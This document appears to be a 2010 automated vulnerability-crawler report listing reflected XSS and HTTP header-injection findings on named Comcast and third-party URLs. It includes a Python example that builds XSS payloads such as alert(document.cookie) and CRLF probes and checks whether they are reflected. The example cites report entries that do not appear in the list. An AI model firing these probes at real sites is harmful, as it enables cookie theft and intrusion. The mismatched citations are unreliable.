comcast.com Web Sites, XSS, CWE-79, CWE-113, CAPEC-86

Cross Site Scripting in Comcast Web Properties | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Dec 19 15:35:53 CST 2010.

1. HTTP header injection

1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]
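
How findings of the two classes in this report are produced and confirmed, as an added worked example (not XSS.CX's scanner code, and not tied to any host listed here): a canary-wrapped probe is appended to a path segment ("REST URL parameter N", counted 1-based from the first segment) or supplied as the name of an extra query parameter ("name of an arbitrarily supplied request parameter"), and the response is then checked either for a header the probe created (section 1, CWE-113) or for the payload echoed verbatim rather than HTML-escaped in the body (section 2, CWE-79). The random hex prefix and suffix around the payload is the pattern visible in the report's own URLs, e.g. entries 2.176 and 2.228, where 74f43/935e2e5728f and a2b00/b3b513ae740 bracket the payload. The header name X-Injected, the token c4nary, the fixed canaries and every response in demo() are constructed for this example; nothing here is a captured response.

```python
"""Canary-wrapped probes for the two finding classes in this report.
Constructed example; the responses in demo() are made up, not captured."""
import re
import secrets
from typing import Optional
from urllib.parse import quote, urlsplit, urlunsplit

# The two payload shapes visible in the report's URLs (entries 2.176, 2.228):
# one closes an HTML comment, the other closes a quoted attribute.
XSS_PAYLOADS = (
    "--><img src=a onerror=alert(document.cookie)>",
    '"><script>alert(document.cookie)</script>',
)


def make_probe(payload: str, prefix: Optional[str] = None,
               suffix: Optional[str] = None):
    """Return (prefix, probe, suffix). Random hex on both sides lets the
    checker find the echo and tell a verbatim reflection from an encoded one;
    fixed values may be passed in to make a run reproducible."""
    pre = prefix if prefix is not None else secrets.token_hex(3)
    suf = suffix if suffix is not None else secrets.token_hex(5)
    return pre, pre + payload + suf, suf


def inject_rest_param(url: str, index: int, probe: str) -> str:
    """'REST URL parameter N': append the probe to the N-th path segment
    (1-based, as in the report), percent-encoded for the path."""
    parts = urlsplit(url)
    segs = parts.path.split("/")              # segs[0] is '' (leading slash)
    if not 1 <= index < len(segs) or segs[index] == "":
        raise IndexError(f"no path segment {index} in {parts.path}")
    segs[index] += quote(probe, safe="")
    return urlunsplit(parts._replace(path="/".join(segs)))


def inject_param_name(url: str, probe: str) -> str:
    """'name of an arbitrarily supplied request parameter': the probe is the
    parameter name, which catches pages that echo unknown parameter names."""
    parts = urlsplit(url)
    extra = quote(probe, safe="") + "=1"
    query = f"{parts.query}&{extra}" if parts.query else extra
    return urlunsplit(parts._replace(query=query))


def classify_body_reflection(body: str, pre: str, payload: str, suf: str) -> dict:
    """Locate pre...suf in an HTML body. 'verbatim' is the reflected-XSS
    condition; an HTML-escaped echo is reflected but not exploitable as is."""
    m = re.search(re.escape(pre) + r"(.*?)" + re.escape(suf), body, re.S)
    if not m:
        return {"reflected": False, "verbatim": False, "echo": None}
    echo = m.group(1)
    return {"reflected": True, "verbatim": echo == payload, "echo": echo}


def header_injected(raw_response: str, name: str, token: str) -> bool:
    """True if 'name: token' is a header line of its own, i.e. the CRLF in the
    probe terminated the previous header instead of being encoded away."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:        # skip the status line
        hname, sep, hval = line.partition(":")
        if sep and hname.strip().lower() == name.lower() and hval.strip() == token:
            return True
    return False


def demo() -> dict:
    """Run both checks over constructed responses, one entry of each class."""
    # Entry 1.1 shape: REST URL parameter 1 is the segment '1ab3'.
    hdr_url = "http://www.destinationurl.com/1ab3/dclk.beacon/beacon1"
    token = "c4nary"                           # constructed marker value
    crlf_probe = "\r\nX-Injected: " + token
    # Constructed redirector responses: one copies the segment into Location
    # with the CRLF intact (header injected), one percent-encodes it (safe).
    vuln_head = ("HTTP/1.1 302 Found\r\n"
                 f"Location: http://www.destinationurl.com/1ab3{crlf_probe}\r\n"
                 "Content-Length: 0\r\n\r\n")
    safe_head = ("HTTP/1.1 302 Found\r\n"
                 "Location: http://www.destinationurl.com/1ab3"
                 + quote(crlf_probe, safe="") + "\r\nContent-Length: 0\r\n\r\n")
    # Entry 2.157 shape: REST URL parameter 2 is the ZIP segment '19103';
    # the fixed canaries reproduce the bracketing seen in entry 2.176.
    xss_url = "http://www.comcast.net/local/19103/"
    pre, probe, suf = make_probe(XSS_PAYLOADS[0], "74f43", "935e2e5728f")
    # Constructed bodies: one echoes the segment raw inside an HTML comment,
    # the other HTML-escapes it before echoing.
    vuln_body = f"<!-- zip: 19103{probe} --><div>Local</div>"
    safe_body = ("<!-- zip: 19103" + pre
                 + "--&gt;&lt;img src=a onerror=alert(document.cookie)&gt;"
                 + suf + " -->")
    return {
        "hdr_url": inject_rest_param(hdr_url, 1, crlf_probe),
        "hdr_vuln": header_injected(vuln_head, "X-Injected", token),
        "hdr_safe": header_injected(safe_head, "X-Injected", token),
        "xss_url": inject_rest_param(xss_url, 2, probe),
        "xss_vuln": classify_body_reflection(vuln_body, pre, XSS_PAYLOADS[0], suf),
        "xss_safe": classify_body_reflection(safe_body, pre, XSS_PAYLOADS[0], suf),
    }
```

Calling demo() prints nothing; it returns the built test URLs and the verdicts for the vulnerable and safe constructed responses. The payload has to match the context the segment lands in (an HTML comment for the `-->` form, a quoted attribute for the `">` form), so a "reflected but not verbatim" result means the value came back encoded and is not an XSS finding as is; a verbatim echo, or a header line that only exists because the probe's CRLF was honoured, is what the entries in this report record.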

2. Cross-site scripting (reflected)

2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]

2.19. http://digg.com/submit [REST URL parameter 1]

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]

